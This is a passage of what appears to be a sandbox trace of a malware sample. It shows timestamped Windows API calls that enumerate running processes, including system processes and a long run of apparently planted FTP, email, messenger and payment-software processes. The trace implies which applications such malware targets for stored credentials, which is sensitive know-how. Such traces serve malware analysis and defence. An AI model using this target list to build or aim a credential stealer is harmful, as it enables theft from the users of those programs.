(dwMilliseconds=0x64) [0196.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1990 [0196.890] Process32First (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.893] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.895] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.898] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.900] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.902] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.904] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.906] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.909] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.914] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.916] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.922] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.924] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.926] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.928] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.931] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.933] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.935] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.938] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.940] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0196.942] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0196.945] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.947] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0196.949] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.951] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0196.958] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0196.960] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0196.962] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0196.964] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0196.966] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0196.968] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.970] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.972] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0196.976] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.978] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.981] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0196.983] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0196.986] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0196.993] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0196.996] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0197.001] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0197.003] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0197.005] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0197.007] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0197.010] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0197.014] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0197.017] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0197.019] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0197.021] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0197.023] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0197.027] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0197.029] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0197.031] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0197.033] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0197.034] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0197.036] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0197.093] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0197.095] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0197.097] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0197.099] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0197.101] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0197.106] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0197.108] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0197.110] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0197.113] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0197.116] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0197.119] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0197.122] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0197.125] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0197.127] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0197.129] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0197.131] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0197.135] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0197.137] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0197.139] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0197.141] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0197.142] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0197.144] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0197.146] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0197.148] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0197.150] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0197.152] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0197.154] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0197.156] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0197.158] Process32Next (in: hSnapshot=0x1990, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 